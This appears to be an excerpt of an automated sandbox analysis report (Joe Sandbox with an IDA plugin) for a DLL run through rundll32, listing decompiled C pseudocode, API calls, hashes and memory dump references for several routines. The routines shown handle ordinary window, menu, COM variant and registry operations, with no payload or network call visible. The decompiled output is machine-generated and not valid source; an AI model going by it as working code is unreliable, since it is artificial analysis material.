                                                                                                            • Opcode ID: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                                                            • Instruction ID: c60af2d58918d4078ab001666915cbd37c2ef6b2e54b6b359c888c98dc157d7e
                                                                                                            • Opcode Fuzzy Hash: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                                                            • Instruction Fuzzy Hash: CC616DB5A00605EFDB64CF68C88199EBBF5EB44324B21C57EE055EB391E730EE859B40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 41%
                                                                                                            			E1000F210(void* __ecx, void* __edx) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed int _t73;
                                                                                                            				intOrPtr _t85;
                                                                                                            				intOrPtr* _t89;
                                                                                                            				intOrPtr* _t92;
                                                                                                            				intOrPtr* _t94;
                                                                                                            				void* _t99;
                                                                                                            				intOrPtr _t109;
                                                                                                            				intOrPtr _t110;
                                                                                                            				intOrPtr _t122;
                                                                                                            				void* _t124;
                                                                                                            				void* _t126;
                                                                                                            				void* _t128;
                                                                                                            				void* _t129;
                                                                                                            
                                                                                                            				_t117 = __edx;
                                                                                                            				E10011BF0(0x1003b066, _t126);
                                                                                                            				_t129 = _t128 - 0x6c;
                                                                                                            				_t73 = 0;
                                                                                                            				_t124 = __ecx;
                                                                                                            				 *((intOrPtr*)(__ecx + 0x44)) = 1;
                                                                                                            				 *(_t126 - 0x10) = 0;
                                                                                                            				 *(_t126 - 0x18) = 0;
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
                                                                                                            					L21:
                                                                                                            					 *(_t124 + 0x44) =  *(_t124 + 0x44) & 0x00000000;
                                                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				do {
                                                                                                            					_t104 = _t73 + _t73 * 4 << 3;
                                                                                                            					_t109 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + (_t73 + _t73 * 4 << 3) + 0x24));
                                                                                                            					if(_t109 == 0) {
                                                                                                            						goto L19;
                                                                                                            					}
                                                                                                            					_t110 =  *((intOrPtr*)(_t109 + 4));
                                                                                                            					 *((intOrPtr*)(_t126 - 0x20)) = _t110;
                                                                                                            					if(_t110 == 0) {
                                                                                                            						goto L19;
                                                                                                            					}
                                                                                                            					 *(_t126 - 0x14) =  *(_t126 - 0x10) << 4;
                                                                                                            					do {
                                                                                                            						_t122 =  *((intOrPtr*)(E10006D96(_t126 - 0x20)));
                                                                                                            						 *((intOrPtr*)(_t126 - 0x24)) = 0xfffffffd;
                                                                                                            						E10011C50(_t126 - 0x78, 0, 0x20);
                                                                                                            						_t129 = _t129 + 0xc;
                                                                                                            						E10010592(_t126 - 0x48);
                                                                                                            						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
                                                                                                            						_t135 =  *((intOrPtr*)(_t124 + 0x48));
                                                                                                            						if( *((intOrPtr*)(_t124 + 0x48)) == 0) {
                                                                                                            							_t85 =  *((intOrPtr*)(_t124 + 0x40)) +  *(_t126 - 0x14);
                                                                                                            							__eflags = _t85;
                                                                                                            						} else {
                                                                                                            							_t99 = E1000ECE8(_t104, _t124, _t117, _t122, _t124, _t135, _t126 - 0x58,  *(_t126 - 0x18) + 1);
                                                                                                            							 *(_t126 - 4) = 1;
                                                                                                            							E10010578(_t99, _t126 - 0x48, _t99);
                                                                                                            							 *(_t126 - 4) = 0;
                                                                                                            							__imp__#9(_t126 - 0x58);
                                                                                                            							_t85 = _t126 - 0x48;
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)(_t126 - 0x38)) = _t85;
                                                                                                            						 *((intOrPtr*)(_t126 - 0x34)) = _t126 - 0x24;
                                                                                                            						 *((intOrPtr*)(_t126 - 0x30)) = 1;
                                                                                                            						 *((intOrPtr*)(_t126 - 0x2c)) = 1;
                                                                                                            						 *(_t122 + 0x84) = 1;
                                                                                                            						_t89 =  *((intOrPtr*)(_t122 + 0x4c));
                                                                                                            						if(_t89 != 0) {
                                                                                                            							_t117 = _t126 - 0x1c;
                                                                                                            							_push(_t126 - 0x1c);
                                                                                                            							_push(0x10043098);
                                                                                                            							_push(_t89);
                                                                                                            							if( *((intOrPtr*)( *_t89))() >= 0) {
                                                                                                            								_t92 =  *((intOrPtr*)(_t126 - 0x1c));
                                                                                                            								_t117 = _t126 - 0x38;
                                                                                                            								 *((intOrPtr*)( *_t92 + 0x18))(_t92,  *((intOrPtr*)(_t122 + 0x98)), 0x10043018, 0, 4, _t126 - 0x38, 0, _t126 - 0x78, _t126 - 0x28);
                                                                                                            								_t94 =  *((intOrPtr*)(_t126 - 0x1c));
                                                                                                            								 *((intOrPtr*)( *_t94 + 8))(_t94);
                                                                                                            								 *(_t122 + 0x84) =  *(_t122 + 0x84) & 0x00000000;
                                                                                                            								if( *((intOrPtr*)(_t126 - 0x74)) != 0) {
                                                                                                            									__imp__#6( *((intOrPtr*)(_t126 - 0x74)));
                                                                                                            								}
                                                                                                            								if( *((intOrPtr*)(_t126 - 0x70)) != 0) {
                                                                                                            									__imp__#6( *((intOrPtr*)(_t126 - 0x70)));
                                                                                                            								}
                                                                                                            								if( *((intOrPtr*)(_t126 - 0x6c)) != 0) {
                                                                                                            									__imp__#6( *((intOrPtr*)(_t126 - 0x6c)));
                                                                                                            								}
                                                                                                            								 *(_t126 - 0x10) =  *(_t126 - 0x10) + 1;
                                                                                                            								 *(_t126 - 0x14) =  *(_t126 - 0x14) + 0x10;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
                                                                                                            						__imp__#9(_t126 - 0x48);
                                                                                                            					} while ( *((intOrPtr*)(_t126 - 0x20)) != 0);
                                                                                                            					_t73 =  *(_t126 - 0x18);
                                                                                                            					L19:
                                                                                                            					_t73 = _t73 + 1;
                                                                                                            					 *(_t126 - 0x18) = _t73;
                                                                                                            				} while (_t73 <  *((intOrPtr*)(_t124 + 0x10)));
                                                                                                            				goto L21;
                                                                                                            			}




















                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000F215
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000F2C7
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000F348
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000F357
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000F366
                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 1000F37B
                                                                                                              • Part of subcall function 1000ECE8: __EH_prolog.LIBCMT ref: 1000ECED
                                                                                                              • Part of subcall function 1000ECE8: VariantClear.OLEAUT32(?), ref: 1000ED4F
                                                                                                              • Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearFreeString$H_prolog$Copy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3098219910-0
                                                                                                            • Opcode ID: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
                                                                                                            • Instruction ID: 75c5e2025475ce32d6cb8a8ad57bceb5efa69f1f793163f183f6db466388bc1f
                                                                                                            • Opcode Fuzzy Hash: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
                                                                                                            • Instruction Fuzzy Hash: 455117B1900209AFEB14CFA4C884BEEBBB9FF08355F104529E116EB655D774AA45CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 61%
                                                                                                            			E1002B9F8(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v17;
                                                                                                            				char _v18;
                                                                                                            				signed int _v19;
                                                                                                            				char _v28;
                                                                                                            				long _v32;
                                                                                                            				signed int _v36;
                                                                                                            				char _v52;
                                                                                                            				intOrPtr _t41;
                                                                                                            				intOrPtr* _t44;
                                                                                                            				signed char _t63;
                                                                                                            				intOrPtr* _t85;
                                                                                                            				intOrPtr* _t88;
                                                                                                            
                                                                                                            				_t41 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_t88 = __ecx;
                                                                                                            				_push( &_v28);
                                                                                                            				_push(_a4);
                                                                                                            				_v8 = _t41;
                                                                                                            				_push(0x417);
                                                                                                            				 *((intOrPtr*)( *__ecx + 0x110))();
                                                                                                            				_t44 = _a8;
                                                                                                            				 *(_t44 + 8) =  *(_t44 + 8) ^ 0x00000004;
                                                                                                            				_v18 = 0;
                                                                                                            				_v17 = 0;
                                                                                                            				 *((char*)(_t44 + 0xa)) = 0;
                                                                                                            				 *((char*)(_t44 + 0xb)) = 0;
                                                                                                            				if(E10011FB0(_t44,  &_v28, 0x14) != 0) {
                                                                                                            					_v36 = E100202AB(_t88);
                                                                                                            					E100202DF(_t88, 0x10000000, 0, 0);
                                                                                                            					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, __edi);
                                                                                                            					_v32 = SendMessageA( *(_t88 + 0x1c), 0x43d, 0, 0);
                                                                                                            					SendMessageA( *(_t88 + 0x1c), 0xb, 0, 0);
                                                                                                            					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32 + 1, 0);
                                                                                                            					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32, 0);
                                                                                                            					SendMessageA( *(_t88 + 0x1c), 0xb, 1, 0);
                                                                                                            					_t85 = _a8;
                                                                                                            					 *((intOrPtr*)( *_t88 + 0x110))(0x415, _a4, _t85);
                                                                                                            					E100202DF(_t88, 0, _v36 & 0x10000000, 0);
                                                                                                            					_t63 =  *((intOrPtr*)(_t85 + 9));
                                                                                                            					if(((_t63 ^ _v19) & 0x00000001) != 0 || (_t63 & 0x00000001) != 0 &&  *_t85 != _v28) {
                                                                                                            						_push(1);
                                                                                                            						_push(0);
                                                                                                            						goto L7;
                                                                                                            					} else {
                                                                                                            						_push( &_v52);
                                                                                                            						_push(_a4);
                                                                                                            						_push(0x41d);
                                                                                                            						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
                                                                                                            							_push(1);
                                                                                                            							_push( &_v52);
                                                                                                            							L7:
                                                                                                            							_t45 = InvalidateRect( *(_t88 + 0x1c), ??, ??);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(_t45, _v8);
                                                                                                            			}

















                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • SendMessageA.USER32(?,0000043D,00000000,00000000), ref: 1002BA88
                                                                                                            • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 1002BA94
                                                                                                            • SendMessageA.USER32(?,0000043C,?,00000000), ref: 1002BAA4
                                                                                                            • SendMessageA.USER32(?,0000043C,?,00000000), ref: 1002BAB2
                                                                                                            • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 1002BABC
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 1002BB26
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$InvalidateLongRectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 74886174-0
                                                                                                            • Opcode ID: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                                                            • Instruction ID: d3f4ff1b3068862bce3741e6c92e476afb765aaf48ff9a7e93f31cae0c4b6ca1
                                                                                                            • Opcode Fuzzy Hash: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                                                            • Instruction Fuzzy Hash: D0416CB0600248BFEB11DB94DC95EFEBBB9EF48744F414459FA41AB291C6B0AD45CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 77%
                                                                                                            			E10030A77(void* __ecx, intOrPtr __edx) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				struct tagMSG _v32;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t30;
                                                                                                            				void* _t32;
                                                                                                            				void* _t34;
                                                                                                            				void* _t36;
                                                                                                            				intOrPtr* _t37;
                                                                                                            				void* _t41;
                                                                                                            				intOrPtr _t55;
                                                                                                            				void* _t56;
                                                                                                            				void* _t57;
                                                                                                            				void* _t60;
                                                                                                            				void* _t61;
                                                                                                            				intOrPtr* _t62;
                                                                                                            
                                                                                                            				_t58 = __edx;
                                                                                                            				_t60 = __ecx;
                                                                                                            				if(GetCapture() != 0) {
                                                                                                            					L20:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				E100220EE(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
                                                                                                            				if(E100220EE(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
                                                                                                            					L19:
                                                                                                            					E100308EB(_t60, _t72);
                                                                                                            					goto L20;
                                                                                                            				} else {
                                                                                                            					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                                                                                            						_t30 = _v32.message - 0x100;
                                                                                                            						if(_t30 == 0) {
                                                                                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                                                            							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
                                                                                                            								E1003075A(_t60, _v32.wParam, 1);
                                                                                                            							}
                                                                                                            							__eflags = _v32.wParam - 0x1b;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								L18:
                                                                                                            								_t32 = E100220EE(_t61, GetCapture());
                                                                                                            								_t72 = _t32 -  *((intOrPtr*)(_t60 + 0x68));
                                                                                                            								if(_t32 ==  *((intOrPtr*)(_t60 + 0x68))) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							goto L19;
                                                                                                            						}
                                                                                                            						_t34 = _t30 - 1;
                                                                                                            						if(_t34 == 0) {
                                                                                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                                                            							if(__eflags != 0) {
                                                                                                            								E1003075A(_t60, _v32.wParam, 0);
                                                                                                            							}
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            						_t36 = _t34 - 0xff;
                                                                                                            						if(_t36 == 0) {
                                                                                                            							_t55 = _v32.pt;
                                                                                                            							_t58 = _v8;
                                                                                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                                                            							_push(_t55);
                                                                                                            							_push(_t55);
                                                                                                            							_t37 = _t62;
                                                                                                            							 *_t37 = _t55;
                                                                                                            							 *((intOrPtr*)(_t37 + 4)) = _v8;
                                                                                                            							_t56 = _t60;
                                                                                                            							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
                                                                                                            								E1003078E(_t56, 0);
                                                                                                            							} else {
                                                                                                            								E100306DB(_t56);
                                                                                                            							}
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            						_t41 = _t36;
                                                                                                            						if(_t41 == 0) {
                                                                                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                                                            							_t57 = _t60;
                                                                                                            							if(__eflags == 0) {
                                                                                                            								E10030A33(_t61, __eflags);
                                                                                                            							} else {
                                                                                                            								E10030930(_t57, _t58, 0, _t60, __eflags);
                                                                                                            							}
                                                                                                            							return 1;
                                                                                                            						}
                                                                                                            						if(_t41 == 0) {
                                                                                                            							goto L19;
                                                                                                            						}
                                                                                                            						DispatchMessageA( &_v32);
                                                                                                            						goto L18;
                                                                                                            					}
                                                                                                            					_push(_v32.wParam);
                                                                                                            					E1003A098();
                                                                                                            					goto L19;
                                                                                                            				}
                                                                                                            			}




















                                                                                                            0x10030b11
                                                                                                            0x10030b11
                                                                                                            0x00000000
                                                                                                            0x10030b0f
                                                                                                            0x10030ae1
                                                                                                            0x10030ae2
                                                                                                            0x10030b77
                                                                                                            0x10030b7d
                                                                                                            0x10030b7f
                                                                                                            0x10030b88
                                                                                                            0x10030b81
                                                                                                            0x10030b81
                                                                                                            0x10030b81
                                                                                                            0x00000000
                                                                                                            0x10030b8f
                                                                                                            0x10030aea
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10030af0
                                                                                                            0x00000000
                                                                                                            0x10030af0
                                                                                                            0x10030b6d
                                                                                                            0x10030b70
                                                                                                            0x00000000
                                                                                                            0x10030b70

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Capture$Message$Dispatch
                                                                                                            • String ID:
                                                                                                            • API String ID: 3654672037-0
                                                                                                            • Opcode ID: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                                                            • Instruction ID: d9b79505f63fc07e8b5b8f3565facbd5cf555a7e12dc77f8d6b56f2636bb58fe
                                                                                                            • Opcode Fuzzy Hash: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                                                            • Instruction Fuzzy Hash: 8431B434A02609AFCB63DBB58C65D6FF6E8EF80787F104419B445DA163CB30A980D762
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002A1CA(void* __ecx) {
                                                                                                            				struct HACCEL__* _t25;
                                                                                                            				void* _t44;
                                                                                                            				void* _t45;
                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                            				struct HINSTANCE__* _t47;
                                                                                                            				struct HINSTANCE__* _t48;
                                                                                                            
                                                                                                            				_t44 = __ecx;
                                                                                                            				_t40 = __ecx + 0x60;
                                                                                                            				_t25 =  *(__ecx + 0x60);
                                                                                                            				_t45 = 0;
                                                                                                            				if( *((intOrPtr*)(_t25 - 0xc)) == 0) {
                                                                                                            					_t25 = E10006A60(_t40,  *((intOrPtr*)(__ecx + 0x3c)));
                                                                                                            				}
                                                                                                            				if( *(_t44 + 0x44) != _t45 &&  *((intOrPtr*)(_t44 + 0x2c)) == _t45) {
                                                                                                            					_t48 =  *(E100373B5() + 0xc);
                                                                                                            					 *((intOrPtr*)(_t44 + 0x2c)) = LoadMenuA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
                                                                                                            					_t25 = LoadAcceleratorsA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
                                                                                                            					 *(_t44 + 0x30) = _t25;
                                                                                                            					_t45 = 0;
                                                                                                            				}
                                                                                                            				if( *(_t44 + 0x40) != _t45 &&  *((intOrPtr*)(_t44 + 0x34)) == _t45) {
                                                                                                            					_t47 =  *(E100373B5() + 0xc);
                                                                                                            					 *((intOrPtr*)(_t44 + 0x34)) = LoadMenuA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
                                                                                                            					_t25 = LoadAcceleratorsA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
                                                                                                            					 *(_t44 + 0x38) = _t25;
                                                                                                            					_t45 = 0;
                                                                                                            				}
                                                                                                            				if( *(_t44 + 0x48) != _t45 &&  *((intOrPtr*)(_t44 + 0x24)) == _t45) {
                                                                                                            					_t46 =  *(E100373B5() + 0xc);
                                                                                                            					 *((intOrPtr*)(_t44 + 0x24)) = LoadMenuA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
                                                                                                            					_t25 = LoadAcceleratorsA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
                                                                                                            					 *(_t44 + 0x28) = _t25;
                                                                                                            				}
                                                                                                            				return _t25;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Load$AcceleratorsMenu
                                                                                                            • String ID:
                                                                                                            • API String ID: 144087665-0
                                                                                                            • Opcode ID: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                                                            • Instruction ID: 79ec512449ce6a4c7bf2710ae8ff5bed15bebc86ac40dbf708adfd4365bfde7a
                                                                                                            • Opcode Fuzzy Hash: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                                                            • Instruction Fuzzy Hash: 8821EA75401B18DFC3B0EF6A9940937F3F8FF09651751446FEA8A86912DA36F890DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002B105(struct HWND__* _a4, struct HWND__** _a8) {
                                                                                                            				struct HWND__* _t7;
                                                                                                            				void* _t13;
                                                                                                            				struct HWND__** _t15;
                                                                                                            				struct HWND__* _t16;
                                                                                                            				struct HWND__* _t17;
                                                                                                            				struct HWND__* _t18;
                                                                                                            
                                                                                                            				_t18 = _a4;
                                                                                                            				_t17 = _t18;
                                                                                                            				if(_t18 != 0) {
                                                                                                            					L5:
                                                                                                            					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
                                                                                                            						L8:
                                                                                                            						_t16 = _t17;
                                                                                                            						_t7 = _t17;
                                                                                                            						if(_t17 == 0) {
                                                                                                            							L10:
                                                                                                            							if(_t18 == 0 && _t17 != 0) {
                                                                                                            								_t17 = GetLastActivePopup(_t17);
                                                                                                            							}
                                                                                                            							_t15 = _a8;
                                                                                                            							if(_t15 != 0) {
                                                                                                            								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
                                                                                                            									 *_t15 =  *_t15 & 0x00000000;
                                                                                                            								} else {
                                                                                                            									 *_t15 = _t16;
                                                                                                            									EnableWindow(_t16, 0);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							return _t17;
                                                                                                            						} else {
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            						do {
                                                                                                            							L9:
                                                                                                            							_t16 = _t7;
                                                                                                            							_t7 = GetParent(_t7);
                                                                                                            						} while (_t7 != 0);
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            					_t17 = GetParent(_t17);
                                                                                                            					L7:
                                                                                                            					if(_t17 != 0) {
                                                                                                            						goto L5;
                                                                                                            					}
                                                                                                            					goto L8;
                                                                                                            				}
                                                                                                            				_t13 = E1002B0CC();
                                                                                                            				if(_t13 != 0) {
                                                                                                            					L4:
                                                                                                            					_t17 =  *(_t13 + 0x1c);
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				_t13 = E10006C53();
                                                                                                            				if(_t13 != 0) {
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				_t17 = 0;
                                                                                                            				goto L8;
                                                                                                            			}









                                                                                                            0x1002b122
                                                                                                            0x1002b129
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002b12b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                            • String ID:
                                                                                                            • API String ID: 670545878-0
                                                                                                            • Opcode ID: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                                                            • Instruction ID: ef498eb2053f32fc83163eb1be06eb9c016c70d7a0359ba6d8f1e9348af6cf1d
                                                                                                            • Opcode Fuzzy Hash: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                                                            • Instruction Fuzzy Hash: E111A332601F764FD362DA6AACA4B2B77DCDF41BD1FD20159EC04D7211DB60EC104290
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002B501(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
                                                                                                            				long _t21;
                                                                                                            				void* _t28;
                                                                                                            
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
                                                                                                            					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x64));
                                                                                                            				}
                                                                                                            				if(_a8 != 0) {
                                                                                                            					_t28 = E10035959(__ecx, _a4);
                                                                                                            					if(_a12 != 0) {
                                                                                                            						if(_t28 == 0) {
                                                                                                            							L3:
                                                                                                            							return 0;
                                                                                                            						}
                                                                                                            						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
                                                                                                            						L10:
                                                                                                            						RegCloseKey(_t28);
                                                                                                            						return 0 | _t21 == 0x00000000;
                                                                                                            					}
                                                                                                            					if(_t28 == 0) {
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            					_t21 = RegDeleteValueA(_t28, _a8);
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            				_t28 = E100358C8(__ecx);
                                                                                                            				if(_t28 != 0) {
                                                                                                            					_t21 = RegDeleteKeyA(_t28, _a4);
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            				goto L3;
                                                                                                            			}






                                                                                                            APIs
                                                                                                            • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 1002B525
                                                                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 1002B545
                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10024C29,?), ref: 1002B570
                                                                                                              • Part of subcall function 100358C8: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                                                              • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                                                              • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                                                              • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 10035945
